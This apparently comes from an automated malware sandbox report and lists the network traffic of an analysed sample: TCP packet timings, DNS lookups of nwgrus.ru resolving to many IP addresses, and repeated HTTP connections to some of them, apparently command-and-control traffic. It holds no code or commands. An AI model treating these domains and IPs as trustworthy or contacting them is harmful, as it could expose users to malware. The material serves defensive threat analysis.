Sep 30, 2024 15:38:55.405797958 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.446940899 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.446954966 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.446995974 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.447045088 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.447073936 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.447089911 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.447514057 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.447523117 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.447546005 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.447557926 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.447566032 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.447577000 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.449166059 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.449203968 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.449227095 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.449249983 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.449258089 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.449280977 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.456386089 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.456398964 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.456460953 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.456474066 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.457146883 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.457197905 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.457206964 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.457228899 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.457266092 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.457351923 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.457370996 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.457381010 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.457387924 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.614501953 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.614527941 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.615259886 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.615575075 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.615582943 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.238059044 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.238122940 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.244766951 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.244782925 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.245191097 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.246299982 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.246495962 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.246509075 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.520132065 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.520220041 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.520288944 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.520498991 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.520498991 CEST	49748	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.520522118 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.520531893 CEST	443	49748	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.545496941 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.545605898 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:56.545679092 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.546163082 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:56.546200037 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.219074011 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.219162941 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.220932961 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.220963955 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.221640110 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.222336054 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.222383022 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.222394943 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.565474987 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.565574884 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.565680981 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.565756083 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.565793037 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.565793037 CEST	49749	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:57.565829992 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:57.565854073 CEST	443	49749	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:01.944885969 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:01.944938898 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:01.945019960 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:01.948708057 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:01.948724031 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:02.551740885 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:02.551882982 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:02.840775013 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:02.840801954 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:02.841203928 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:02.933475971 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:03.092829943 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:03.092921019 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:03.092933893 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:03.458271980 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:03.458352089 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:03.458441019 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:03.461476088 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:03.461500883 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:03.461514950 CEST	49750	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:39:03.461520910 CEST	443	49750	23.145.40.162	192.168.2.8
Sep 30, 2024 15:39:33.961661100 CEST	49751	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:33.966715097 CEST	80	49751	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:33.966810942 CEST	49751	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:33.966938019 CEST	49751	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:33.966985941 CEST	49751	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:33.971939087 CEST	80	49751	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:33.972208977 CEST	80	49751	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:34.947253942 CEST	80	49751	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:34.947633028 CEST	80	49751	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:34.947698116 CEST	49751	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:34.947814941 CEST	49751	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:34.952574968 CEST	80	49751	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:35.761183023 CEST	49752	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:35.766216040 CEST	80	49752	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:35.766324997 CEST	49752	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:35.766473055 CEST	49752	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:35.766506910 CEST	49752	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:35.771320105 CEST	80	49752	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:35.773209095 CEST	80	49752	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:36.911855936 CEST	80	49752	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:36.916297913 CEST	80	49752	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:36.916353941 CEST	49752	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:36.916414976 CEST	49752	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:36.921190977 CEST	80	49752	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:39.434309959 CEST	49753	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:39.439409018 CEST	80	49753	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:39.439696074 CEST	49753	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:39.439867973 CEST	49753	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:39.440026045 CEST	49753	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:39.444622993 CEST	80	49753	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:39.444920063 CEST	80	49753	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:40.478954077 CEST	80	49753	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:40.479079962 CEST	80	49753	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:40.479139090 CEST	49753	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:40.479188919 CEST	49753	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:40.484101057 CEST	80	49753	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:46.691587925 CEST	49754	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:46.696660042 CEST	80	49754	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:46.696757078 CEST	49754	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:46.696904898 CEST	49754	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:46.696937084 CEST	49754	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:46.701838017 CEST	80	49754	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:46.701951981 CEST	80	49754	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:47.649435043 CEST	80	49754	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:47.649873018 CEST	80	49754	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:47.650001049 CEST	49754	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:47.663799047 CEST	49754	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:47.668896914 CEST	80	49754	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:56.147528887 CEST	49755	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:56.152559042 CEST	80	49755	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:56.152637959 CEST	49755	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:56.152930975 CEST	49755	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:56.152930975 CEST	49755	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:56.157846928 CEST	80	49755	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:56.157860994 CEST	80	49755	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:57.130166054 CEST	80	49755	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:57.130187988 CEST	80	49755	187.228.112.175	192.168.2.8
Sep 30, 2024 15:39:57.130254984 CEST	49755	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:57.130433083 CEST	49755	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:39:57.137403965 CEST	80	49755	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:08.762703896 CEST	49756	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:40:08.767687082 CEST	80	49756	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:08.767813921 CEST	49756	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:40:08.768022060 CEST	49756	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:40:08.768075943 CEST	49756	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:40:08.772794962 CEST	80	49756	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:08.772926092 CEST	80	49756	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:09.910373926 CEST	80	49756	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:09.910399914 CEST	80	49756	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:09.910485983 CEST	49756	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:40:09.910594940 CEST	49756	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:40:09.915339947 CEST	80	49756	187.228.112.175	192.168.2.8
Sep 30, 2024 15:40:16.819159031 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:16.819215059 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:16.819271088 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:16.819753885 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:16.819766998 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.407783985 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.407907963 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.484548092 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.484569073 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.484962940 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.577455997 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.577692032 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.577728987 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.914979935 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.915092945 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.916212082 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.916306019 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.916327000 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:17.916342020 CEST	49757	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:17.916347980 CEST	443	49757	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:23.501794100 CEST	49758	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:23.506649971 CEST	80	49758	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:23.506861925 CEST	49758	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:23.506861925 CEST	49758	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:23.508078098 CEST	49758	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:23.511784077 CEST	80	49758	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:23.513035059 CEST	80	49758	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:24.269634962 CEST	80	49758	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:24.269792080 CEST	80	49758	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:24.269864082 CEST	49758	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:24.270076990 CEST	49758	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:24.274859905 CEST	80	49758	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:37.044555902 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.044630051 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:37.044704914 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.045286894 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.045305014 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:37.642054081 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:37.642164946 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.643441916 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.643455029 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:37.643697977 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:37.644630909 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.644670963 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:37.644692898 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:38.006520033 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:38.006927013 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:38.006987095 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:38.007025003 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:38.007047892 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:38.007066011 CEST	49759	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:38.007071972 CEST	443	49759	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:45.412314892 CEST	49760	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:45.417406082 CEST	80	49760	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:45.417500973 CEST	49760	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:45.417623043 CEST	49760	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:45.417640924 CEST	49760	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:45.422547102 CEST	80	49760	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:45.422617912 CEST	80	49760	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:46.200867891 CEST	80	49760	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:46.200927973 CEST	80	49760	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:46.200997114 CEST	49760	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:46.201169968 CEST	49760	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:40:46.205950975 CEST	80	49760	109.121.204.14	192.168.2.8
Sep 30, 2024 15:40:58.707047939 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:58.707104921 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:58.707173109 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:58.707680941 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:58.707695961 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.307431936 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.307504892 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.316551924 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.316576958 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.316875935 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.326967955 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.327004910 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.327172995 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.669682980 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.669764042 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.669814110 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.669956923 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.669979095 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:40:59.669994116 CEST	49761	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:40:59.669998884 CEST	443	49761	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:08.379215956 CEST	49762	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:41:08.384114981 CEST	80	49762	109.121.204.14	192.168.2.8
Sep 30, 2024 15:41:08.384185076 CEST	49762	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:41:08.384318113 CEST	49762	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:41:08.384341002 CEST	49762	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:41:08.389102936 CEST	80	49762	109.121.204.14	192.168.2.8
Sep 30, 2024 15:41:08.389115095 CEST	80	49762	109.121.204.14	192.168.2.8
Sep 30, 2024 15:41:09.207103014 CEST	80	49762	109.121.204.14	192.168.2.8
Sep 30, 2024 15:41:09.207516909 CEST	80	49762	109.121.204.14	192.168.2.8
Sep 30, 2024 15:41:09.207581997 CEST	49762	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:41:09.207623005 CEST	49762	80	192.168.2.8	109.121.204.14
Sep 30, 2024 15:41:09.212410927 CEST	80	49762	109.121.204.14	192.168.2.8
Sep 30, 2024 15:41:22.021891117 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.021938086 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.022027969 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.022394896 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.022413969 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.620795012 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.620956898 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.622133017 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.622147083 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.622383118 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.625318050 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.625318050 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.625391960 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.977950096 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.978044987 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.978112936 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.978297949 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.978319883 CEST	443	49763	23.145.40.162	192.168.2.8
Sep 30, 2024 15:41:22.978337049 CEST	49763	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:41:22.978343010 CEST	443	49763	23.145.40.162	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:37:49.031186104 CEST	51416	53	192.168.2.8	1.1.1.1
Sep 30, 2024 15:37:50.027431965 CEST	51416	53	192.168.2.8	1.1.1.1
Sep 30, 2024 15:37:51.027476072 CEST	51416	53	192.168.2.8	1.1.1.1
Sep 30, 2024 15:37:51.350625038 CEST	53	51416	1.1.1.1	192.168.2.8
Sep 30, 2024 15:37:51.350683928 CEST	53	51416	1.1.1.1	192.168.2.8
Sep 30, 2024 15:37:51.350713968 CEST	53	51416	1.1.1.1	192.168.2.8
Sep 30, 2024 15:38:43.734596968 CEST	57759	53	192.168.2.8	1.1.1.1
Sep 30, 2024 15:38:43.858412027 CEST	53	57759	1.1.1.1	192.168.2.8
Sep 30, 2024 15:40:23.364310980 CEST	62346	53	192.168.2.8	1.1.1.1
Sep 30, 2024 15:40:23.498295069 CEST	53	62346	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 15:37:49.031186104 CEST	192.168.2.8	1.1.1.1	0xebcb	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:50.027431965 CEST	192.168.2.8	1.1.1.1	0xebcb	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.027476072 CEST	192.168.2.8	1.1.1.1	0xebcb	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:38:43.734596968 CEST	192.168.2.8	1.1.1.1	0x748d	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.364310980 CEST	192.168.2.8	1.1.1.1	0x9450	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	187.228.112.175	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	148.255.44.91	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	186.123.165.48	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.146.112.188	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350625038 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	189.163.45.204	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	187.228.112.175	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	148.255.44.91	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	186.123.165.48	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.146.112.188	A (IP address)	IN (0x0001)	false
